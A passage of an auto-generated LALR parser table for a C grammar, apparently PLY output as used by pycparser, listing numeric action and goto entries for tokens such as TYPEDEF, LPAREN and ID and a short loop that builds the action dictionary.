,496,497,500,505,506,510,511,512,514,515,536,554,555,557,558,575,576,578,579,],[29,65,-113,-128,76,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,65,-120,-115,-65,-102,65,-131,-108,-238,-111,76,-122,-63,-129,112,-29,-121,-116,-62,-112,-70,-52,-123,-117,65,65,-119,65,-114,-130,29,-118,-71,-103,65,-9,-131,-91,-10,-96,-98,65,-131,-95,-101,-97,29,-53,65,76,-88,112,65,-93,29,-147,-335,-146,29,-167,-166,76,-182,-100,-126,76,29,-87,-90,-94,-92,-61,-72,76,29,-144,-142,65,29,76,-73,65,-89,29,29,29,-149,-159,-160,-156,-336,76,-183,-30,76,76,76,112,76,76,-74,29,29,29,29,-174,-175,29,-143,-140,29,-141,-145,76,-76,-79,-82,-75,-77,65,-81,-215,-214,-80,-216,-78,-127,29,-153,29,-151,-148,-157,-168,-69,-36,-35,29,29,29,-234,-233,65,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,76,29,-229,-232,-221,-83,-219,-68,-33,-32,76,76,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'TYPEDEF':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,86,87,89,90,93,96,97,98,100,101,109,111,118,119,123,124,129,180,181,182,187,191,200,211,223,240,241,278,284,285,286,289,291,298,300,301,302,303,305,308,312,314,316,317,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[7,7,-113,-128,7,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,7,-120,-115,-65,-102,7,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,7,7,-119,7,-114,-130,7,-118,-71,-103,7,-131,-96,-98,7,-131,-95,-101,-97,-53,7,7,-88,7,-147,-335,-146,-167,-166,-100,-126,7,-87,-61,-72,7,-73,7,-89,-149,-336,-30,7,-74,-174,-175,7,-76,-79,-82,-75,-77,7,-81,-215,-214,-80,-216,-78,-127,-153,-151,-148,-168,-69,-36,-35,7,7,7,-234,-233,7,-231,-217,-230,-81,-84,-218,-152,-150,-170,-169,-31,-34,7,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'XOR':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,251,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,251,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,251,-267,-269,251,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'AUTO':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,86,87,89,90,93,96,97,98,100,101,109,111,118,119,123,124,129,180,181,182,187,191,200,211,223,240,241,278,284,285,286,289,291,298,300,301,302,303,305,308,312,314,316,317,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[26,26,-113,-128,26,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,26,-120,-115,-65,-102,26,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,26,26,-119,26,-114,-130,26,-118,-71,-103,26,-131,-96,-98,26,-131,-95,-101,-97,-53,26,26,-88,26,-147,-335,-146,-167,-166,-100,-126,26,-87,-61,-72,26,-73,26,-89,-149,-336,-30,26,-74,-174,-175,26,-76,-79,-82,-75,-77,26,-81,-215,-214,-80,-216,-78,-127,-153,-151,-148,-168,-69,-36,-35,26,26,26,-234,-233,26,-231,-217,-230,-81,-84,-218,-152,-150,-170,-169,-31,-34,26,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'DIVEQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,357,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'TIMES':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,22,23,25,26,27,29,30,33,34,35,36,37,38,39,40,43,44,45,46,47,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,69,71,76,80,81,82,85,87,89,91,94,96,97,98,100,101,103,104,105,106,109,111,116,117,119,120,121,122,123,124,126,128,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,156,158,160,161,162,163,164,165,166,167,168,169,171,173,174,175,176,177,180,181,187,191,192,198,201,202,204,205,206,211,218,219,220,223,224,227,229,230,231,232,233,234,235,236,237,238,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,263,265,266,268,269,273,275,278,279,280,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,310,312,314,316,317,319,328,329,332,336,338,339,342,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,442,443,445,447,448,449,459,472,475,477,478,480,481,482,483,484,487,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,547,549,550,551,553,554,555,557,558,565,566,569,574,575,576,577,578,579,],[35,-337,-113,-128,35,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,-120,-115,-65,-102,-126,-131,-108,-238,-111,-337,-122,35,-63,-129,35,-121,-116,-62,-112,-70,-123,-117,-337,-337,-119,-337,-114,-130,35,-118,-71,-103,-337,-9,-131,-91,-10,-96,35,-98,-131,-95,-101,-97,173,-126,35,35,-93,-147,-335,-146,-167,-166,-28,35,-182,-27,-100,-126,173,-337,-87,-90,-94,-92,-61,-72,35,-337,173,-317,-321,-318,-286,-303,-285,-324,-330,-313,-319,-144,-301,-274,-314,173,-142,-327,173,-283,-287,-325,-304,-322,-302,-255,-315,-289,253,-328,-316,-288,-329,-320,-276,-323,173,-284,173,173,-312,35,-73,173,-149,-336,35,-183,173,35,336,-28,-337,35,352,-28,-337,-74,-274,-337,173,-326,173,-280,173,-277,-334,-332,-331,-333,-174,-175,173,173,173,173,173,173,173,173,173,173,173,173,173,173,173,173,173,173,173,-298,-297,173,173,-279,-143,-278,-140,35,-141,-145,420,-76,-79,-82,-75,173,-77,173,173,-81,-215,-214,-80,-216,173,-78,-312,-127,-153,-151,-148,173,-168,173,-69,-284,173,173,35,-284,173,173,-244,-247,-245,-241,-242,-246,-248,173,-250,-251,-243,-249,-12,173,173,-11,253,253,253,253,253,253,253,253,253,253,-257,-256,253,253,253,253,253,-258,-296,-295,-294,-293,-292,-305,173,173,173,494,-234,-233,173,-231,173,173,-217,173,-230,173,-84,-218,173,173,-152,-150,35,173,-170,-169,-337,-337,-198,173,-281,-282,173,-290,-291,173,-275,-337,-284,-229,-232,173,-221,173,-83,-219,-68,541,-28,-337,173,-11,173,173,-220,173,173,173,-284,173,173,-306,173,-337,-299,173,-225,-224,-222,-84,-300,173,173,173,-226,-223,173,-228,-227,]),'LPAREN':([0,1,2,3,4,5,6,7,8,10,11,12,13,14,15,16,17,18,19,20,22,23,25,26,27,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,69,71,72,73,76,77,80,81,82,85,86,87,89,91,94,96,97,98,100,101,103,104,105,106,109,111,112,116,117,119,120,121,122,123,124,126,127,128,131,132,133,134,135,136,137,138,139,140,141,142,143,145,146,147,148,149,150,151,152,153,154,155,156,160,161,163,164,165,166,167,168,169,170,171,173,174,175,176,177,180,181,187,191,192,198,199,200,201,202,204,205,206,211,216,218,219,220,223,227,229,230,231,233,235,236,237,238,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,263,265,266,269,275,276,278,279,280,282,283,284,285,286,289,290,291,292,296,297,298,299,300,301,302,303,305,307,308,310,311,312,314,316,317,319,328,329,332,336,338,339,340,341,342,344,345,347,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,402,403,404,405,407,411,412,413,414,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,442,443,445,447,448,449,453,454,457,458,459,464,465,472,475,477,481,482,483,484,488,489,490,492,494,496,497,499,500,502,504,505,506,510,511,512,513,514,515,518,519,521,522,529,530,531,532,533,535,536,537,538,539,541,542,543,544,545,547,549,550,551,553,554,555,557,558,559,560,565,566,569,570,571,574,575,576,577,578,579,],[37,-337,-113,-128,69,-124,-110,-106,85,-104,-107,-125,-105,-64,37,-60,-67,-99,-66,-109,-120,-115,-65,-102,-126,95,-108,-238,-111,-337,-122,37,-63,-129,37,116,-29,-121,-116,-62,-112,-70,118,-123,-117,-337,-337,-119,-337,-114,-130,37,-118,-71,-103,-337,-9,95,-91,-10,-96,69,-98,69,129,-131,-37,-95,-101,-97,174,118,-126,69,37,-93,-147,-335,-146,-167,-166,-28,-180,-182,-27,-100,-126,95,174,-337,-87,-90,-94,-92,-61,-72,69,129,-337,229,-317,-321,-318,-286,-303,-285,-324,-330,-313,-319,-144,-301,-314,231,-142,-327,233,-283,-287,-325,-304,-322,239,-302,-315,-289,-328,-316,-288,-329,-320,266,-323,267,174,-284,229,233,-312,278,-73,229,-149,-336,69,-183,-181,-30,229,69,229,-28,-337,342,-38,229,-28,-337,-74,-337,229,-326,229,229,-334,-332,-331,-333,-174,-175,174,174,174,174,174,174,174,174,174,174,174,174,174,174,174,174,229,174,174,-298,-297,229,229,-143,-140,278,278,-141,-145,-337,422,-76,-79,-82,-75,229,-77,427,430,174,229,434,-81,-215,-214,-80,-216,229,-78,-312,441,-127,-153,-151,-148,174,-168,174,-69,-284,229,229,-36,-35,342,342,460,-45,-284,229,229,-44,-43,-244,-247,-245,-241,-242,-246,-248,229,-250,-251,-243,-249,-12,174,229,-11,-296,-295,-294,-293,-292,-305,229,174,422,229,229,-234,-233,229,-231,229,229,-217,229,-230,229,-84,-218,229,229,-152,-150,69,174,-170,-169,-31,-34,342,460,-337,-39,-42,-337,-198,174,174,-290,-291,229,-337,-213,-207,-211,-284,-229,-232,229,-221,229,538,-83,-219,-68,-33,-32,229,-28,-337,-41,-40,229,-11,-209,-208,-210,-212,229,229,-220,229,229,229,-284,229,229,-51,-50,-306,229,-337,-299,229,-225,-224,-222,-84,-46,-49,-300,229,229,-48,-47,229,-226,-223,229,-228,-227,]),'MINUSMINUS':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,132,133,134,135,136,137,138,139,140,141,143,145,146,148,149,150,151,152,153,154,156,160,161,163,164,165,166,167,168,169,171,173,174,175,176,181,191,198,201,204,205,206,218,219,220,227,229,230,231,233,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,263,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,310,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,402,403,404,405,407,411,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,482,483,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,547,549,550,551,553,554,555,557,558,565,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,175,-335,-28,-182,-27,175,-337,-87,-72,-337,175,-317,-321,-318,-286,-303,-285,-324,-330,-313,-319,-301,-314,175,-327,175,-283,-287,-325,-304,-322,-302,-315,-289,-328,-316,-288,-329,-320,261,-323,175,-284,175,175,-312,175,-336,-183,175,175,-28,-337,175,-28,-337,-337,175,-326,175,175,-334,-332,-331,-333,175,175,175,175,175,175,175,175,175,175,175,175,175,175,175,175,175,175,175,-298,-297,175,175,-337,-76,-79,-82,-75,175,-77,175,175,-81,-215,-214,-80,-216,175,-78,-312,175,175,-69,-284,175,175,-284,175,175,-244,-247,-245,-241,-242,-246,-248,175,-250,-251,-243,-249,-12,175,175,-11,-296,-295,-294,-293,-292,-305,175,175,175,175,-234,-233,175,-231,175,175,-217,175,-230,175,-84,-218,175,175,175,-337,-337,-198,175,175,-290,-291,175,-337,-284,-229,-232,175,-221,175,-83,-219,-68,175,-28,-337,175,-11,175,175,-220,175,175,175,-284,175,175,-306,175,-337,-299,175,-225,-224,-222,-84,-300,175,175,175,-226,-223,175,-228,-227,]),'ID':([0,1,2,3,4,5,6,7,10,11,12,13,14,15,16,17,18,19,20,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,43,44,45,46,47,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,69,71,72,76,80,81,82,85,87,89,91,94,96,97,98,100,101,102,103,104,105,106,109,111,116,117,118,119,120,121,122,123,124,126,128,129,131,135,137,142,146,147,149,150,151,165,171,173,174,175,180,181,187,191,192,193,194,198,199,201,202,204,205,206,211,218,219,220,223,227,229,231,233,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,262,264,265,266,269,275,279,280,282,284,285,286,287,289,290,291,297,298,300,301,302,303,305,307,308,312,314,316,317,319,327,328,329,332,336,338,339,342,344,349,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,372,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,442,443,445,447,448,449,457,459,460,472,475,477,481,484,485,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,548,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[42,-337,-113,-128,42,-124,-110,-106,-104,-107,-125,-105,-64,42,-60,-67,-99,-66,-109,-120,-115,-154,-65,-102,-126,-155,-131,-108,98,101,-238,-111,-337,-122,42,-63,-129,42,-121,-116,-62,-112,-70,-123,-117,-337,-337,-119,-337,-114,-130,42,-118,-71,-103,-337,-9,-131,-91,-10,-96,42,-98,42,-131,-95,-101,-97,176,-126,42,42,-93,-147,-335,-146,-167,-166,197,-28,-180,-182,-27,-100,-126,176,-337,176,-87,-90,-94,-92,-61,-72,42,-337,176,176,-286,-285,-144,176,-142,176,-283,-287,-288,176,-284,176,176,-73,310,-149,-336,42,197,197,-183,-181,176,42,176,-28,-337,42,176,-28,-337,-74,-337,176,176,176,-174,-175,176,176,176,176,176,176,176,176,176,176,176,176,176,176,176,176,176,176,176,403,405,176,176,-143,-140,-141,-145,-337,-76,-79,-82,423,-75,176,-77,176,310,-81,-215,-214,-80,-216,310,-78,-127,-153,-151,-148,176,197,-168,176,-69,-284,176,176,42,42,176,-284,176,176,-244,-247,-245,-241,-242,-246,-248,176,-250,-251,-243,-249,-12,176,176,176,-11,176,176,176,176,-234,-233,176,-231,310,176,-217,176,-230,310,-84,-218,310,176,-152,-150,42,176,-170,-169,42,-337,176,-337,-198,176,176,176,176,-337,-284,-229,-232,176,-221,310,-83,-219,-68,176,-28,-337,176,-11,176,310,-220,310,176,310,-284,176,176,176,176,-337,176,-225,-224,-222,-84,176,310,310,-226,-223,310,-228,-227,]),'IF':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,311,-336,-76,-79,-82,-75,-77,311,-81,-215,-214,-80,-216,311,-78,-69,-234,-233,-231,311,-217,-230,311,-84,-218,311,-229,-232,-221,311,-83,-219,-68,311,-220,311,311,-225,-224,-222,-84,311,311,-226,-223,311,-228,-227,]),'STRING_LITERAL':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,136,137,146,149,150,151,152,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,230,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,333,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,452,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,152,-335,-28,-182,-27,152,-337,-87,-72,-337,152,-286,230,-285,152,152,-283,-287,-325,-288,152,-284,152,152,152,-336,-183,152,152,-28,-337,152,-28,-337,-337,152,-326,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,-337,-76,-79,-82,-75,152,-77,152,152,-81,-215,-214,-80,-216,152,-78,152,152,-69,152,-284,152,152,-284,152,152,-244,-247,-245,-241,-242,-246,-248,152,-250,-251,-243,-249,-12,152,152,-11,152,152,152,152,-234,-233,152,-231,152,152,-217,152,-230,152,-84,-218,152,152,152,230,-337,-337,-198,152,152,152,-337,-284,-229,-232,152,-221,152,-83,-219,-68,152,-28,-337,152,-11,152,152,-220,152,152,152,-284,152,152,152,-337,152,-225,-224,-222,-84,152,152,152,-226,-223,152,-228,-227,]),'FLOAT':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[44,-337,-113,-128,44,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,44,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,44,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,44,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,44,-131,-95,-101,-97,44,-53,-126,44,-88,44,44,-93,44,-147,-335,-146,44,-167,-166,-182,-100,-126,44,-87,-90,-94,-92,-61,-72,44,-144,-142,44,44,44,-73,44,-89,44,44,44,-149,-159,-160,-156,-336,44,-183,-30,44,44,-74,44,44,44,44,-174,-175,44,-143,-140,44,-141,-145,-76,-79,-82,-75,-77,44,-81,-215,-214,-80,-216,-78,-127,44,-153,44,-151,-148,-157,-168,-69,-36,-35,44,44,44,-234,-233,44,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,44,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'XOREQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,361,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'LSHIFTEQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,363,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'RBRACKET':([3,39,58,76,103,105,106,117,128,132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,178,191,198,204,205,218,219,224,225,230,232,234,235,236,237,238,261,263,268,272,273,282,334,335,336,337,351,352,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,406,407,411,419,420,421,455,456,459,466,467,468,471,476,478,480,482,483,486,487,491,493,494,513,514,524,540,541,547,551,561,562,564,565,],[-128,-129,-130,-131,-28,-182,-27,-337,-337,-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,-253,-328,-316,-329,-320,-276,-323,-312,-252,-336,-183,-337,-28,-337,-28,-274,-239,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-235,-278,-337,453,-4,454,-3,464,465,-261,-273,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,-270,-258,-296,-295,-294,-293,482,-292,-305,-337,492,-337,511,512,-337,518,519,-240,520,-237,-281,-282,-290,-291,-236,-275,529,530,531,-337,-28,-254,559,560,-306,-299,570,571,572,-300,]),} + +_lr_action = {} +for _k, _v in _lr_action_items.items(): + for _x,_y in zip(_v[0],_v[1]): + if not _x in _lr_action: _lr_action[_x] = {} + _lr_action[_x][_k] = _y +del _lr_action_items + +_lr_goto_items = {'expression_statement':([181,298,307,429,437,440,502,535,537,539,569,574,577,],[284,284,284,284,284,284,284,284,284,284,284,284,284,]),'struct_or_union_specifier':([0,21,40,59,75,85,91,93,95,99,118,129,172,174,181,184,185,186,214,229,231,233,239,267,278,298,313,315,342,350,422,427,460,],[5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,]),'init_declarator_list':([4,89,],[70,70,]),'init_declarator_list_opt':([4,89,],[79,79,]),'iteration_statement':([181,298,307,429,437,440,502,535,537,539,569,574,577,],[285,285,285,285,285,285,285,285,285,285,285,285,285,]),'static_assert':([0,59,181,298,307,429,437,440,502,535,537,539,569,574,577,],[17,17,286,286,286,286,286,286,286,286,286,286,286,286,286,]),'unified_string_literal':([85,116,131,146,149,171,174,175,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,333,338,339,353,354,364,373,375,412,413,419,421,427,429,430,434,437,440,441,447,477,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,452,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,]),'assignment_expression_opt':([204,218,419,421,513,],[334,351,491,493,540,]),'brace_open':([31,32,92,96,98,100,101,130,131,181,201,229,298,307,375,413,429,437,440,477,478,479,502,521,535,537,539,569,574,577,],[99,102,181,184,185,193,194,181,227,181,227,181,181,181,227,488,181,181,181,488,488,488,181,227,181,181,181,181,181,181,]),'enumerator':([102,193,194,327,],[195,195,195,450,]),'typeid_noparen_declarator':([211,],[348,]),'type_qualifier_list_opt':([35,117,128,206,220,282,459,515,],[104,204,218,339,354,419,513,543,]),'declaration_specifiers_no_type_opt':([1,27,52,53,55,63,87,],[66,94,120,121,122,94,94,]),'expression_opt':([181,298,307,427,429,437,440,499,502,533,535,537,539,553,566,569,574,577,],[288,288,288,498,288,288,288,534,288,552,288,288,288,567,573,288,288,288,]),'designation':([227,472,488,550,],[369,369,369,369,]),'parameter_list':([118,129,278,342,422,460,],[213,213,213,213,213,213,]),'alignment_specifier':([0,1,4,21,27,52,53,55,59,63,75,85,87,89,93,95,99,118,129,174,177,181,184,185,186,192,211,229,231,233,239,267,278,298,313,315,342,350,422,427,460,],[53,53,81,53,53,53,53,53,53,53,53,142,53,81,53,142,142,53,53,142,280,53,142,142,142,280,81,142,142,142,142,142,53,53,142,142,53,53,53,53,53,]),'labeled_statement':([181,298,307,429,437,440,502,535,537,539,569,574,577,],[289,289,289,289,289,289,289,289,289,289,289,289,289,]),'abstract_declarator':([177,211,278,342,],[281,281,418,418,]),'translation_unit':([0,],[59,]),'init_declarator':([4,89,126,202,],[84,84,217,331,]),'direct_abstract_declarator':([177,211,276,278,342,344,457,],[283,283,414,283,283,414,414,]),'designator_list':([227,472,488,550,],[376,376,376,376,]),'identifier':([85,116,118,129,131,146,149,171,174,175,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,349,353,354,364,372,373,375,412,413,419,421,427,429,430,434,437,440,441,447,460,477,481,484,485,499,502,513,521,533,535,537,538,539,542,543,548,549,553,566,569,574,577,],[143,143,215,215,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,461,143,143,143,470,143,143,143,143,143,143,143,143,143,143,143,143,143,143,215,143,143,143,527,143,143,143,143,143,143,143,143,143,143,143,563,143,143,143,143,143,143,]),'offsetof_member_designator':([485,],[526,]),'unary_expression':([85,116,131,146,149,171,174,175,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,413,419,421,427,429,430,434,437,440,441,447,477,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[144,144,224,232,234,144,224,273,224,224,224,224,224,224,224,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,224,144,144,224,224,224,144,224,224,144,144,224,224,224,224,224,144,224,224,144,224,224,224,224,224,224,224,224,224,144,144,144,224,224,224,224,224,224,224,224,224,224,224,224,224,224,224,224,224,224,]),'abstract_declarator_opt':([177,211,],[274,343,]),'initializer':([131,201,375,521,],[226,330,473,546,]),'direct_id_declarator':([0,4,15,37,40,59,69,72,89,91,126,192,202,211,342,344,445,457,],[48,48,86,48,48,48,48,86,48,48,48,48,48,48,48,86,48,86,]),'struct_declaration_list':([99,184,185,],[186,313,315,]),'pp_directive':([0,59,],[14,14,]),'declaration_list':([21,75,],[93,93,]),'id_init_declarator':([40,91,],[108,108,]),'type_specifier':([0,21,40,59,75,85,91,93,95,99,118,129,172,174,181,184,185,186,214,229,231,233,239,267,278,298,313,315,342,350,422,427,460,],[18,18,109,18,18,147,109,18,147,147,18,18,269,147,18,147,147,147,109,147,147,147,147,147,18,18,147,147,18,18,18,18,18,]),'compound_statement':([92,130,181,229,298,307,429,437,440,502,535,537,539,569,574,577,],[180,223,291,378,291,291,291,291,291,291,291,291,291,291,291,291,]),'pointer':([0,4,37,40,59,69,89,91,104,126,177,192,202,211,278,342,445,],[15,72,15,15,15,72,72,15,199,72,276,72,72,344,276,457,72,]),'typeid_declarator':([4,69,89,126,192,202,445,],[74,125,74,74,74,74,74,]),'id_init_declarator_list':([40,91,],[113,113,]),'declarator':([4,89,126,192,202,445,],[78,78,78,324,78,324,]),'argument_expression_list':([266,],[409,]),'struct_declarator_list_opt':([192,],[322,]),'block_item_list':([181,],[298,]),'parameter_type_list_opt':([278,342,422,],[417,417,495,]),'struct_declarator':([192,445,],[323,508,]),'type_qualifier':([0,1,4,21,27,35,52,53,55,59,63,75,85,87,89,93,95,99,103,117,118,128,129,172,174,177,181,184,185,186,192,205,206,211,219,220,229,231,233,239,267,278,282,298,313,315,342,350,422,427,459,460,514,515,],[52,52,80,52,52,105,52,52,52,52,52,52,105,52,80,52,105,105,198,105,52,105,52,198,105,279,52,105,105,105,279,198,105,80,198,105,105,105,105,105,105,52,105,52,105,105,52,52,52,52,105,52,198,105,]),'assignment_operator':([224,],[364,]),'expression':([174,181,229,231,233,258,265,290,298,307,427,429,430,434,437,440,441,499,502,533,535,537,538,539,549,553,566,569,574,577,],[270,294,270,270,270,399,406,426,294,294,294,294,501,503,294,294,507,294,294,294,294,294,556,294,564,294,294,294,294,294,]),'storage_class_specifier':([0,1,4,21,27,52,53,55,59,63,75,87,89,93,118,129,181,211,278,298,342,350,422,427,460,],[1,1,68,1,1,1,1,1,1,1,1,1,68,1,1,1,1,68,1,1,1,1,1,1,1,]),'unified_wstring_literal':([85,116,131,146,149,171,174,